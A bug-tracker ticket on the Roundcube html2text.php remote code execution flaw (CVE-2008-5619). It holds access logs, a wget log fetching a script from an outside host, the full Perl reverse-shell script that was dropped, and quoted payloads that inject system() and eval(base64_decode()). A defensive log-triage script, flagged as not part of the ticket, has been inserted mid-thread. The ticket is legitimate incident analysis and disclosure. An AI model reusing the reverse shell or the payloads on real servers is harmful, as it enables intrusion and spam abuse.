Ticket #1485618 (closed Bugs: fixed)

Opened 14 months ago

Last modified 9 months ago

Break-in possibility via html2text.php?

Reported by: RealMurphy Owned by:
Priority: 5 Milestone: 0.2-stable
Component: Security issue Version: 0.2-beta
Severity: critical Keywords: security
Cc: pnfisher@…

Description (last modified by till) (diff)

Hi all,

Since I cannot reproduce this, I try to describe this problem from the current installation status and not against trunk (sorry for that).

Last night someone broke into my apache-container via roundcube (99.9% sure here). The system is a current Debian Lenny, with these versions:

roundcube 0.2-beta
PHP 5.2.6
mailserver is postfix on a remote virtual server

In the logs I have found the following:

apache's access.log:

192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

192.168.100.2 is another webserver acting as a proxy to this webmail apache (i.e. just rewriting and forwarding the requests); the real IP was

200.171.152.187 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
200.171.152.187 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 502 595 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

In the error log I see this nasty bit at the same time:

--2008-12-08 23:05:16--  http://mmbt.co.uk/img/back.txt
Resolving mmbt.co.uk... 81.31.121.138
Connecting to mmbt.co.uk|81.31.121.138|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541 [text/plain]
Saving to: `back.txt.1'

     0K                                                       100% 56.0M=0s

2008-12-08 23:05:16 (56.0 MB/s) - `back.txt.1' saved [541/541]

For completeness this is the script which was downloaded:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

There is nothing in either the console, errors or sendmail log messages of roundcube.

Since I believe this is potentially dangerous (and this incident happened to put my box onto several blacklists for sending out >50k spam emails) I've bumped up the severity.

Anything else you could need from me?

Cheers

Carsten

Change History

  Changed 14 months ago by alec

  • component changed from PHP backend to Security issue
  • milestone changed from later to 0.2-stable

  Changed 14 months ago by ziba

bin/html2text.php does use html_entity_decode which had a security issue: http://www.juniper.net/security/auto/vulnerabilities/vuln17296.html

but that was supposed to be fixed in PHP 5.1.3-RC1

  Changed 14 months ago by ksteinhoff

Why do you suspect html2text.php? The time stamp on error log entry you quote is 23:05:16 and the time stamps in your transfer log lines begin at 23:07:50.

  Changed 14 months ago by RealMurphy

OK, trying to do it better this time. html2text.php was the only call with POST data. Unless I'm mistaken, with a GET you will not be able to break into a system, right? The initial copy & paste was not covering the full log file, sorry about that. This is the full access.log:

192.168.100.2 - - [08/Dec/2008:17:41:46 +0100] "GET /roundcube/skins/default/images/display/info.png HTTP/1.1" 200 2162 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:55 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:04:59 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 88 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:38 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "http://www.google.com/search?hl=en&q=intitle:%22RoundCube+Webmail%22+site:com&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:27 +0100] "GET /roundcube/skins/default/images/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/skins/default/common.css HTTP/1.1" 200 6680 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:28 +0100] "GET /roundcube/program/js/common.js HTTP/1.1" 200 16650 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:29 +0100] "GET /roundcube/program/js/app.js HTTP/1.1" 200 110423 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/roundcube_logo.png HTTP/1.1" 200 4868 "https://myhost/roundcube/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/listheader_aqua.gif HTTP/1.1" 200 270 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:32 +0100] "GET /roundcube/skins/default/images/buttons/bg.gif HTTP/1.1" 200 211 "https://myhost/roundcube/skins/default/common.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:40 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:06:41 +0100] "GET /roundcube/program/js/tiny_mce/r.php HTTP/1.1" 200 33924 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
192.168.100.2 - - [08/Dec/2008:23:07:50 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [08/Dec/2008:23:08:09 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.168.100.2 - - [09/Dec/2008:12:56:27 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
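Two things in the log above are worth checking mechanically when triaging an incident like this: a User-Agent claiming to be a crawler that submits POST bodies to a helper script (crawlers fetch, they do not post to webmail helpers), and the 23:05:16 entry that appears after the 23:07:53 one. Apache stamps each line with the time the request was received but writes it only when the request completes, so an out-of-order line is a request that held a worker for minutes, which matches the wget run at exactly 23:05:16 in the error log. The following script is an added example, not part of the ticket or of Roundcube; the log lines in it are constructed to resemble the excerpts above (placeholder IP), and the 30-second threshold is an assumption to tune per server.

```python
"""Triage Apache combined-format access log lines for the pattern discussed
in this ticket: POSTs to bin/html2text.php with a spoofed crawler User-Agent,
and out-of-order timestamps that betray a long-running request.
Added example, not code from the ticket or from Roundcube."""
import re
from datetime import datetime, timedelta

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

WATCHED_PATHS = ("/bin/html2text.php",)            # helper scripts reachable without a session
CRAWLER_UA = re.compile(r"Googlebot|bingbot|Slurp", re.I)  # well-known crawler tokens
LONG_REQUEST = timedelta(seconds=30)               # assumed threshold; tune for your server

# Constructed sample lines modelled on the ticket's excerpts (placeholder IP, not the real log).
SAMPLE_LOG = """\
10.0.0.2 - - [08/Dec/2008:23:04:51 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
10.0.0.2 - - [08/Dec/2008:23:06:26 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-BR; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4"
10.0.0.2 - - [08/Dec/2008:23:07:53 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 25 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
10.0.0.2 - - [08/Dec/2008:23:05:16 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
10.0.0.2 - - [09/Dec/2008:06:55:28 +0100] "GET /roundcube/ HTTP/1.1" 200 1247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def triage(lines):
    """Return a list of (line_number, reason) for each suspicious entry.

    Reason 1: a POST to a watched helper script from a User-Agent that claims to
    be a search-engine crawler (crawlers do not submit POST bodies to such scripts).
    Reason 2: the line's timestamp is earlier than the latest one already seen.
    Apache records the request start time but writes the line at completion, so
    the request ran for at least the difference; a helper that normally answers
    in milliseconds holding a worker for minutes deserves a look."""
    findings = []
    latest_ts = None
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        watched = any(rec["path"].endswith(p) for p in WATCHED_PATHS)
        if watched and rec["method"] == "POST" and CRAWLER_UA.search(rec["ua"]):
            findings.append((n, "POST to helper script with crawler User-Agent (crawlers do not POST here)"))
        if latest_ts is not None and latest_ts - rec["ts"] >= LONG_REQUEST:
            gap = int((latest_ts - rec["ts"]).total_seconds())
            findings.append((n, f"logged out of order: request ran at least {gap}s"))
        latest_ts = rec["ts"] if latest_ts is None else max(latest_ts, rec["ts"])
    return findings


if __name__ == "__main__":
    for line_no, reason in triage(SAMPLE_LOG.splitlines()):
        print(f"line {line_no}: {reason}")
```

Run it against a real access.log with `triage(open("access.log").readlines())`; for a reverse proxy setup like the reporter's, run it on the front-end proxy's log so the real client address is kept alongside the findings.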

  Changed 14 months ago by estadtherr

If I understand the description, a vulnerability in html2text.php allowed an attacker to cause your web server to download a malicious perl script (is back.txt the perl script or is back.txt yet another file?) This perl script opens a socket to a host/port specified on its command line and hooks a command shell's input/output to that socket. Through this remote shell, the attacker was able to send out spam from your server.

How did the attacker get the perl script to execute? Are there two vulnerabilities, i.e. allowing a download and allowing execution of an arbitrary script?

  Changed 14 months ago by RealMurphy

It looks like back.txt is the local file name of the perl script. Since I just see the wget output and not the command line it's hard to tell. wget downloaded this file to /tmp and also a zip file named jess.zip, which I still have to figure out what this one does (sorry for not mentioning this earlier, I forgot to look where back.txt would be on the system):

webmail:/tmp# file jess.zip
jess.zip: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped
webmail:/tmp# ldd jess.zip
        not a dynamic executable

Of course this is not a zip file but a root exploit, running strings shows:

Linux vmsplice Local Root Exploit
 By qaaz
!@#$

OK, rounding it up again: It seems that the multiple POST requests were used to download the perl script and the root exploit, and were possibly also used for starting it; however, that part I still don't know how they might have achieved - but my knowledge there is rather limited.

  Changed 14 months ago by till

  • keywords security added
  • description modified (diff)

  Changed 14 months ago by till

That's interesting and we haven't really analyzed this yet, but the quickfix to this issue is to install mod_security on the server. GotRoot has a bunch of filter rules and they catch this stuff easily.

Not the solution to the problem, but a workaround.

Thanks for reporting!

  Changed 14 months ago by alec

  • status changed from new to closed
  • resolution set to fixed

Found vulnerable preg_replace() use. Fixed in r2148, but we'll know for sure when we get POST data used for attack. Closing the ticket now.

  Changed 14 months ago by RealMurphy

I'm still running 0.2-beta as a kind of honeypot. During the night from Saturday to Sunday someone tried the same hack again, but this line did not really log much:

file_put_contents('/var/log/roundcube/hack', date('r').': '.print_r($_REQUEST, true)."\n", FILE_APPEND);

The result:

Sun, 21 Dec 2008 02:42:28 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:32 +0100: Array
(
)

Sun, 21 Dec 2008 02:42:54 +0100: Array
(
)

Apache log lines:

192.168.100.2 - - [21/Dec/2008:02:42:27 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 54 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:32 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 79 "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"
192.168.100.2 - - [21/Dec/2008:02:42:54 +0100] "POST /roundcube/bin/html2text.php HTTP/1.1" 200 - "-" "Googlebot/2.1 ( http://www.google.com/bot.html)"

I leave this issue closed but may add more info on the exploit if I get some.

  Changed 14 months ago by alec

check variables_order in php.ini and set to "GPC"

  Changed 14 months ago by RealMurphy

Done, waiting for the next attack.

  Changed 14 months ago by pnfisher

  • cc pnfisher@… added

We had someone probe our system for the html2text.php exploit today. I've removed the "Host" header, which was properly set.

POST /rc/bin/html2text.php HTTP/1.1
Pragma: no-cache
Accept: */*
Content-Type: ''
Connection: Keep-Alive
Content-Length: 28

<b>{${system(uname -a)}}</b>

  Changed 14 months ago by alec

This bug is known as CVE-2008-5619

  Changed 13 months ago by paul

We were also attacked through html2text.php. The hacker tried to install a backdoor, probably using 'b{${EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))}}/b' as postdata, as explained on http://zastita.com/015038/roundcube-webmail-.html. In the announcement of the security update for Roundcube 0.2 Beta, you might have mentioned that 0.1 Stable was also vulnerable.

follow-up: ↓ 17   Changed 9 months ago by stuge

A customer of mine was also hit by this.

While r2148 fixes the problem in a perfectly safe manner and also adds proper handling for multibyte characters (excellent!) no analysis I have read so far has been completely correct about what is really going on.

preg_replace() with the e modifier allows execution of PHP code, but that's not the problem.

Before the superior fix in r2148, the problem was how entries in the html2text::$replace array were written like so:

      'strtoupper("\\1")',                    // <b>

instead of:

      'strtoupper(\'\\1\')',                    // <b>

When using double quotes in the strtoupper() call, any text which is replaced into there from the POST data can contain complex strings and will have those complex strings processed by PHP, when the entire argument really must be handled as untrusted input.

Using single quotes clarifies to the PHP interpreter that this is data which should not be processed further, so any complex strings will be ignored.

in reply to: ↑ 16   Changed 9 months ago by stuge

Replying to stuge:

> no analysis I have read so far has been completely correct about what is really going on.

To be fair, Jacobo Avariento Gimeno at Sofistic described the problem accurately, but didn't point out the double quotes in the function call.
